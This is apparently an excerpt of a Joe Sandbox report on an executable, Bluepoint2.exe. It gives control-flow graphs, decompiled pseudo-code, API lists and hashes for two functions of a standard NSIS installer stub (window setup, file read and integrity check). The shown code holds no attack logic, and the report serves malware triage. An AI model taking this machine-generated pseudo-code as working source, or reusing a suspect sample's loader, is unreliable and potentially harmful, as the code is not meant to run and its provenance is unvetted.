                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                    • String ID: H7B
                                                                                                                                    • API String ID: 121052019-2300413410
                                                                                                                                    • Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                                                                                                    • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                                                                                                                                    • Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                                                                                                    • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00403D17 Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215stringregistryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 373 403d17-403d2f call 406a35 376 403d31-403d3c GetUserDefaultUILanguage call 4065af 373->376 377 403d43-403d7a call 406536 373->377 380 403d41 376->380 383 403d92-403d98 lstrcatW 377->383 384 403d7c-403d8d call 406536 377->384 382 403d9d-403dc6 call 403fed call 40603f 380->382 390 403e58-403e60 call 40603f 382->390 391 403dcc-403dd1 382->391 383->382 384->383 397 403e62-403e69 call 4066a5 390->397 398 403e6e-403e93 LoadImageW 390->398 391->390 392 403dd7-403dff call 406536 391->392 392->390 399 403e01-403e05 392->399 397->398 401 403f14-403f1c call 40140b 398->401 402 403e95-403ec5 RegisterClassW 398->402 404 403e17-403e23 lstrlenW 399->404 405 403e07-403e14 call 405f64 399->405 413 403f26-403f31 call 403fed 401->413 414 403f1e-403f21 401->414 406 403fe3 402->406 407 403ecb-403f0f SystemParametersInfoW CreateWindowExW 402->407 411 403e25-403e33 lstrcmpiW 404->411 412 403e4b-403e53 call 405f37 call 406668 404->412 405->404 410 403fe5-403fec 406->410 407->401 411->412 417 403e35-403e3f GetFileAttributesW 411->417 412->390 425 403f37-403f51 ShowWindow call 4069c5 413->425 426 403fba-403fc2 call 40579d 413->426 414->410 418 403e41-403e43 417->418 419 403e45-403e46 call 405f83 417->419 418->412 418->419 419->412 433 403f53-403f58 call 4069c5 425->433 434 403f5d-403f6f GetClassInfoW 425->434 431 403fc4-403fca 426->431 432 403fdc-403fde call 40140b 426->432 431->414 435 403fd0-403fd7 call 40140b 431->435 432->406 433->434 438 403f71-403f81 GetClassInfoW RegisterClassW 434->438 439 403f87-403faa DialogBoxParamW call 40140b 434->439 435->414 438->439 443 403faf-403fb8 call 403c67 439->443 443->410
                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E00403D17(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				signed short _t73;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a270;
				_t22 = E00406A35(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x423748;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
					__eflags =  *0x423748;
					if(__eflags == 0) {
						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					_t73 =  *_t22(); // executed
					E004065AF(L"1033", _t73 & 0x0000ffff);
				}
				E00403FED(_t78, _t90);
				_t86 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp";
				 *0x42a2e0 =  *0x42a278 & 0x00000020;
				 *0x42a2fc = 0x10000;
				if(E0040603F(_t90, L"C:\\Users\\Arthur\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040603F(_t98, _t86) == 0) {
						E004066A5(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x429248 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403FED(_t78, __eflags);
							__eflags =  *0x42a300;
							if( *0x42a300 != 0) {
								_t33 = E0040579D(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42922c;
								if( *0x42922c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x423728, 5); // executed
							_t39 = E004069C5("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004069C5("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x429200);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x429200);
								 *0x429224 = _t87;
								RegisterClassW(0x429200);
							}
							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
							E00403C67(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a260;
						 *0x429204 = E00401000;
						 *0x429210 =  *0x42a260;
						 *0x429214 = _t30;
						 *0x429224 = 0x40a3b4;
						if(RegisterClassW(0x429200) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x428200;
					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
					_t63 =  *0x428200; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x428202;
						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406668(_t86, E00405F37(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405F83(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                                                                                                                                    0x00403d1d
                                                                                                                                    0x00403d26
                                                                                                                                    0x00403d2d
                                                                                                                                    0x00403d2f
                                                                                                                                    0x00403d43
                                                                                                                                    0x00403d55
                                                                                                                                    0x00403d5e
                                                                                                                                    0x00403d67
                                                                                                                                    0x00403d6e
                                                                                                                                    0x00403d73
                                                                                                                                    0x00403d7a
                                                                                                                                    0x00403d8d
                                                                                                                                    0x00403d8d
                                                                                                                                    0x00403d98
                                                                                                                                    0x00403d31
                                                                                                                                    0x00403d31
                                                                                                                                    0x00403d3c
                                                                                                                                    0x00403d3c
                                                                                                                                    0x00403d9d
                                                                                                                                    0x00403da7
                                                                                                                                    0x00403db0
                                                                                                                                    0x00403db5
                                                                                                                                    0x00403dc6
                                                                                                                                    0x00403e58
                                                                                                                                    0x00403e60
                                                                                                                                    0x00403e69
                                                                                                                                    0x00403e69
                                                                                                                                    0x00403e7f
                                                                                                                                    0x00403e85
                                                                                                                                    0x00403e93
                                                                                                                                    0x00403f14
                                                                                                                                    0x00403f1c
                                                                                                                                    0x00403f26
                                                                                                                                    0x00403f2b
                                                                                                                                    0x00403f31
                                                                                                                                    0x00403fbb
                                                                                                                                    0x00403fc0
                                                                                                                                    0x00403fc2
                                                                                                                                    0x00403fde
                                                                                                                                    0x00000000
                                                                                                                                    0x00403fde
                                                                                                                                    0x00403fc4
                                                                                                                                    0x00403fca
                                                                                                                                    0x00403fd2
                                                                                                                                    0x00403fd2
                                                                                                                                    0x00000000
                                                                                                                                    0x00403fca
                                                                                                                                    0x00403f3f
                                                                                                                                    0x00403f4a
                                                                                                                                    0x00403f4f
                                                                                                                                    0x00403f51
                                                                                                                                    0x00403f58
                                                                                                                                    0x00403f58
                                                                                                                                    0x00403f63
                                                                                                                                    0x00403f6b
                                                                                                                                    0x00403f6d
                                                                                                                                    0x00403f6f
                                                                                                                                    0x00403f78
                                                                                                                                    0x00403f7b
                                                                                                                                    0x00403f81
                                                                                                                                    0x00403f81
                                                                                                                                    0x00403fa0
                                                                                                                                    0x00403fb1
                                                                                                                                    0x00000000
                                                                                                                                    0x00403fb6
                                                                                                                                    0x00403f1e
                                                                                                                                    0x00403f20
                                                                                                                                    0x00000000
                                                                                                                                    0x00403e95
                                                                                                                                    0x00403e95
                                                                                                                                    0x00403ea1
                                                                                                                                    0x00403eab
                                                                                                                                    0x00403eb1
                                                                                                                                    0x00403eb6
                                                                                                                                    0x00403ec5
                                                                                                                                    0x00403fe3
                                                                                                                                    0x00403fe3
                                                                                                                                    0x00000000
                                                                                                                                    0x00403fe3
                                                                                                                                    0x00403ed4
                                                                                                                                    0x00403f0f
                                                                                                                                    0x00000000
                                                                                                                                    0x00403f0f
                                                                                                                                    0x00403dcc
                                                                                                                                    0x00403dcc
                                                                                                                                    0x00403dcf
                                                                                                                                    0x00403dd1
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403ddf
                                                                                                                                    0x00403df1
                                                                                                                                    0x00403df6
                                                                                                                                    0x00403dff
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403e05
                                                                                                                                    0x00403e07
                                                                                                                                    0x00403e14
                                                                                                                                    0x00403e14
                                                                                                                                    0x00403e1d
                                                                                                                                    0x00403e23
                                                                                                                                    0x00403e4b
                                                                                                                                    0x00403e53
                                                                                                                                    0x00000000
                                                                                                                                    0x00403e35
                                                                                                                                    0x00403e36
                                                                                                                                    0x00403e3f
                                                                                                                                    0x00403e45
                                                                                                                                    0x00403e46
                                                                                                                                    0x00000000
                                                                                                                                    0x00403e46
                                                                                                                                    0x00403e41
                                                                                                                                    0x00403e43
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403e43
                                                                                                                                    0x00403e23

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                                                                                      • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                                                                                    • GetUserDefaultUILanguage.KERNELBASE(00000002,77133420,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403D31
                                                                                                                                      • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                                                                                                    • lstrcatW.KERNEL32(1033,00423748), ref: 00403D98
                                                                                                                                    • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,77133420), ref: 00403E18
                                                                                                                                    • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                                                                                                                                    • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403E36
                                                                                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403E7F
                                                                                                                                    • RegisterClassW.USER32(00429200), ref: 00403EBC
                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ED4
                                                                                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F09
                                                                                                                                    • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,00429200), ref: 00403F6B
                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,00429200), ref: 00403F78
                                                                                                                                    • RegisterClassW.USER32(00429200), ref: 00403F81
                                                                                                                                    • DialogBoxParamW.USER32(?,00000000,004040C5,00000000), ref: 00403FA0
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                    • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                    • API String ID: 606308-1664645273
                                                                                                                                    • Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                                                                                                    • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                                                                                                                                    • Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                                                                                                    • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004030D0 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 204memoryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 446 4030d0-40311e GetTickCount GetModuleFileNameW call 406158 449 403120-403125 446->449 450 40312a-403158 call 406668 call 405f83 call 406668 GetFileSize 446->450 451 40336a-40336e 449->451 458 403243-403251 call 40302e 450->458 459 40315e 450->459 465 403322-403327 458->465 466 403257-40325a 458->466 460 403163-40317a 459->460 463 40317c 460->463 464 40317e-403187 call 4035e2 460->464 463->464 472 40318d-403194 464->472 473 4032de-4032e6 call 40302e 464->473 465->451 468 403286-4032d2 GlobalAlloc call 406b90 call 406187 CreateFileW 466->468 469 40325c-403274 call 4035f8 call 4035e2 466->469 497 4032d4-4032d9 468->497 498 4032e8-403318 call 4035f8 call 403371 468->498 469->465 492 40327a-403280 469->492 476 403210-403214 472->476 477 403196-4031aa call 406113 472->477 473->465 482 403216-40321d call 40302e 476->482 483 40321e-403224 476->483 477->483 495 4031ac-4031b3 477->495 482->483 488 403233-40323b 483->488 489 403226-403230 call 406b22 483->489 488->460 496 403241 488->496 489->488 492->465 492->468 495->483 501 4031b5-4031bc 495->501 496->458 497->451 506 40331d-403320 498->506 501->483 503 4031be-4031c5 501->503 503->483 505 4031c7-4031ce 503->505 505->483 507 4031d0-4031f0 505->507 506->465 509 403329-40333a 506->509 507->465 508 4031f6-4031fa 507->508 510 403202-40320a 508->510 511 4031fc-403200 508->511 512 403342-403347 509->512 513 40333c 509->513 510->483 514 40320c-40320e 510->514 511->496 511->510 515 403348-40334e 512->515 513->512 514->483 515->515 516 403350-403368 call 406113 515->516 516->451
                                                                                                                                    C-Code - Quality: 99%
                                                                                                                                    			E004030D0(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				signed int _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				long _t94;
				signed int _t102;
				signed int _t104;
				void* _t106;
				signed int _t107;
				signed int _t110;
				void* _t111;

				_t94 = 0;
				_v8 = 0;
				_v12 = 0;
				 *0x42a26c = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\Bluepoint2.exe", 0x400);
				_t106 = E00406158(L"C:\\Users\\Arthur\\Desktop\\Bluepoint2.exe", 0x80000000, 3);
				 *0x40a018 = _t106;
				if(_t106 == 0xffffffff) {
					return L"Error launching installer";
				}
				E00406668(0x436800, L"C:\\Users\\Arthur\\Desktop\\Bluepoint2.exe");
				E00406668(0x439000, E00405F83(0x436800));
				_t54 = GetFileSize(_t106, 0);
				__eflags = _t54;
				 *0x420f00 = _t54;
				_t110 = _t54;
				if(_t54 <= 0) {
					L24:
					E0040302E(1);
					__eflags =  *0x42a274 - _t94;
					if( *0x42a274 == _t94) {
						goto L32;
					}
					__eflags = _v12 - _t94;
					if(_v12 == _t94) {
						L28:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t111 = _t57;
						E00406B90(0x40ce68);
						E00406187(0x40ce68,  &_v560, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004035F8( *0x42a274 + 0x1c);
							 *0x420f04 = _t65;
							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x42a270 = _t111;
								 *0x42a278 =  *_t111;
								if((_v40 & 0x00000001) != 0) {
									 *0x42a27c =  *0x42a27c + 1;
									__eflags =  *0x42a27c;
								}
								_t45 = _t111 + 0x44; // 0x44
								_t70 = _t45;
								_t102 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t111;
									_t102 = _t102 - 1;
									__eflags = _t102;
								} while (_t102 != 0);
								_t71 =  *0x420ef4; // 0x5afdd
								 *((intOrPtr*)(_t111 + 0x3c)) = _t71;
								E00406113(0x42a280, _t111 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L32;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004035F8( *0x420ef0);
					_t77 = E004035E2( &_a4, 4);
					__eflags = _t77;
					if(_t77 == 0) {
						goto L32;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L32;
					}
					goto L28;
				} else {
					do {
						_t107 = _t110;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
						__eflags = _t110 - _t82;
						if(_t110 >= _t82) {
							_t107 = _t82;
						}
						_t83 = E004035E2(0x418ef0, _t107);
						__eflags = _t83;
						if(_t83 == 0) {
							E0040302E(1);
							L32:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42a274;
						if( *0x42a274 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E0040302E(0);
							}
							goto L20;
						}
						E00406113( &_v40, 0x418ef0, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t89;
						_t104 =  *0x420ef0; // 0x23252
						 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t110;
						 *0x42a274 = _t104;
						if(_t92 > _t110) {
							goto L32;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v12 = _v12 + 1;
							_t110 = _t92 - 4;
							__eflags = _t107 - _t110;
							if(_t107 > _t110) {
								_t107 = _t110;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t110 -  *0x420f00; // 0x230a5
						if(__eflags < 0) {
							_v8 = E00406B22(_v8, 0x418ef0, _t107);
						}
						 *0x420ef0 =  *0x420ef0 + _t107;
						_t110 = _t110 - _t107;
						__eflags = _t110;
					} while (_t110 != 0);
					_t94 = 0;
					__eflags = 0;
					goto L24;
				}
			}
































                                                                                                                                    0x004030db
                                                                                                                                    0x004030de
                                                                                                                                    0x004030e1
                                                                                                                                    0x004030fb
                                                                                                                                    0x00403100
                                                                                                                                    0x00403113
                                                                                                                                    0x00403118
                                                                                                                                    0x0040311e
                                                                                                                                    0x00000000
                                                                                                                                    0x00403120
                                                                                                                                    0x00403131
                                                                                                                                    0x00403142
                                                                                                                                    0x00403149
                                                                                                                                    0x0040314f
                                                                                                                                    0x00403151
                                                                                                                                    0x00403156
                                                                                                                                    0x00403158
                                                                                                                                    0x00403243
                                                                                                                                    0x00403245
                                                                                                                                    0x0040324a
                                                                                                                                    0x00403251
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00403257
                                                                                                                                    0x0040325a
                                                                                                                                    0x00403286
                                                                                                                                    0x0040328b
                                                                                                                                    0x00403296
                                                                                                                                    0x00403298
                                                                                                                                    0x004032a9
                                                                                                                                    0x004032c4
                                                                                                                                    0x004032ca
                                                                                                                                    0x004032cd
                                                                                                                                    0x004032d2
                                                                                                                                    0x004032f1
                                                                                                                                    0x00403301
                                                                                                                                    0x00403313
                                                                                                                                    0x00403318
                                                                                                                                    0x0040331d
                                                                                                                                    0x00403320
                                                                                                                                    0x00403329
                                                                                                                                    0x0040332d
                                                                                                                                    0x00403335
                                                                                                                                    0x0040333a
                                                                                                                                    0x0040333c
                                                                                                                                    0x0040333c
                                                                                                                                    0x0040333c
                                                                                                                                    0x00403344
                                                                                                                                    0x00403344
                                                                                                                                    0x00403347
                                                                                                                                    0x00403348
                                                                                                                                    0x00403348
                                                                                                                                    0x0040334b
                                                                                                                                    0x0040334d
                                                                                                                                    0x0040334d
                                                                                                                                    0x0040334d
                                                                                                                                    0x00403350
                                                                                                                                    0x00403357
                                                                                                                                    0x00403363
                                                                                                                                    0x00403368
                                                                                                                                    0x00000000
                                                                                                                                    0x00403368
                                                                                                                                    0x00000000
                                                                                                                                    0x00403320
                                                                                                                                    0x00000000
                                                                                                                                    0x004032d4
                                                                                                                                    0x00403262
                                                                                                                                    0x0040326d
                                                                                                                                    0x00403272
                                                                                                                                    0x00403274
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040327d
                                                                                                                                    0x00403280
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040315e
                                                                                                                                    0x00403163
                                                                                                                                    0x00403168
                                                                                                                                    0x0040316c
                                                                                                                                    0x00403173
                                                                                                                                    0x00403178
                                                                                                                                    0x0040317a
                                                                                                                                    0x0040317c
                                                                                                                                    0x0040317c
                                                                                                                                    0x00403180
                                                                                                                                    0x00403185
                                                                                                                                    0x00403187
                                                                                                                                    0x004032e0
                                                                                                                                    0x00403322
                                                                                                                                    0x00000000
                                                                                                                                    0x00403322
                                                                                                                                    0x0040318d
                                                                                                                                    0x00403194
                                                                                                                                    0x00403210
                                                                                                                                    0x00403214
                                                                                                                                    0x00403218
                                                                                                                                    0x0040321d
                                                                                                                                    0x00000000
                                                                                                                                    0x00403214
                                                                                                                                    0x0040319d
                                                                                                                                    0x004031a2
                                                                                                                                    0x004031a5
                                                                                                                                    0x004031aa
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004031ac
                                                                                                                                    0x004031b3
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004031b5
                                                                                                                                    0x004031bc
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004031be
                                                                                                                                    0x004031c5
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004031c7
                                                                                                                                    0x004031ce
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004031d0
                                                                                                                                    0x004031d6
                                                                                                                                    0x004031df
                                                                                                                                    0x004031e5
                                                                                                                                    0x004031e8
                                                                                                                                    0x004031ea
                                                                                                                                    0x004031f0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004031f6
                                                                                                                                    0x004031fa
                                                                                                                                    0x00403202
                                                                                                                                    0x00403202
                                                                                                                                    0x00403205
                                                                                                                                    0x00403208
                                                                                                                                    0x0040320a
                                                                                                                                    0x0040320c
                                                                                                                                    0x0040320c
                                                                                                                                    0x00000000
                                                                                                                                    0x0040320a
                                                                                                                                    0x004031fc
                                                                                                                                    0x00403200
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040321e
                                                                                                                                    0x0040321e
                                                                                                                                    0x00403224
                                                                                                                                    0x00403230
                                                                                                                                    0x00403230
                                                                                                                                    0x00403233
                                                                                                                                    0x00403239
                                                                                                                                    0x00403239
                                                                                                                                    0x00403239
                                                                                                                                    0x00403241
                                                                                                                                    0x00403241
                                                                                                                                    0x00000000
                                                                                                                                    0x00403241

                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 004030E4
                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Bluepoint2.exe,00000400), ref: 00403100
                                                                                                                                      • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\Bluepoint2.exe,80000000,00000003), ref: 0040615C
                                                                                                                                      • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,C:\Users\user\Desktop\Bluepoint2.exe,C:\Users\user\Desktop\Bluepoint2.exe,80000000,00000003), ref: 00403149
